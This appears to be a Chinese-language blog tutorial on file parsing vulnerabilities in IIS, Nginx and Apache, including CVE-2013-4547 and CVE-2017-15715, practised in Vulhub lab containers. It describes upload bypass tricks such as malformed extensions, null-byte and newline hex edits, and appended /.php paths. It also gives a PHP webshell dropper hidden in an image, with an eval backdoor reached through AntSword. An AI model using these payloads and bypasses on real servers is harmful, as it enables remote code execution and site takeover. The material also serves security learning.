文件解析漏洞

avatar
作者
猴君
阅读量:0

IIS解析漏洞

在windows Server 2003安装iis

1.IIS6.X

1.1 目录解析

在网站下建立文件夹的名字为 .asp/.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

先创建一个1.asp文件夹

再创建一个1.txt 里面写 <%=now()%>

2.1 畸形文件解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含asa\cer\cdx

创建一个2.asp;.jpg 

文件里面也写入 <%=now()%>

2.IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件

Nginx解析漏洞

nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件。

》》》利用条件《《《

  • Nginx <=0.8.37
  • cgi.fix_pathinfo=1

》》》利用姿势《《《

Nginx的文件解析漏洞...和IIS7.0的解析漏洞同样的原理,因为cgi.fix_pathinfo=1造成的解析漏洞...

PS:同样使用1.jpg/.php方式进行绕过...

首先进入Vulhub路径开启容器

cd /nginx/nginx_parsing_vulnerability docker-compose build docker-compose up -d docker ps -a

然后浏览器中访问网站

制作图片马并进行上传  获取上传文件地址

访问以下路径,利用Nginx解析漏洞...

http://124.221.58.83:8088/uploadfiles/cfc2ca1a6e0116ae8aa2a469d275c059.jpg/.php

GetShell

写入以下代码

<?php fputs(fopen('hahaha.php','w'),'<?php @eval($_POST["cmd"])?>');?>

传该图片并访问 紧接着利用解析漏洞执行其中的PHP代码

步骤三:访问同级目录下的hahaha.php文件页面为空....紧接着使用蚁剑链接...

CVE-2013-4547

此漏洞为文件名逻辑漏洞,该漏洞在上传图片时,修改其16进制编码可使其绕过策略,导致解析为php。当Nginx得到一个用户请求时,首先对url进行解析,进行正则匹配,如果匹配到以.php后缀结尾的文件名,会将请求的PHP文件交给PHP-CGI去解析。

 直接上传6666.php被拦截...修改文件后缀为.jpg进行上传且在后面添加两个空格  上传成功

在.jpg后面添加两个空格并给上.php后缀,在16进制修改中将原本连个空格的0x20 0x20修改为如下即0x20 0x00进行发包..

访问上传后的文件....由于url会将其编码,需要继续抓包修改0x20 0x200x20 0x00

抓到这个然后%20%20换成空格空格

Apache解析漏洞

apache_parsing

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。如1.php.jpg

然后上传成功后与网站进行路径拼接

CVE-2017-15715

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

影响版本

  • 2.4.0~2.4.29

在hahahaha.php文件后面添加空格0x20在改为0x0a再次返送即可上传成功....

访问上传的hahahaha文件在后面加上%0a再访问发现解析了其中的PHP代码,但后缀不是php说明存在解析漏洞

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!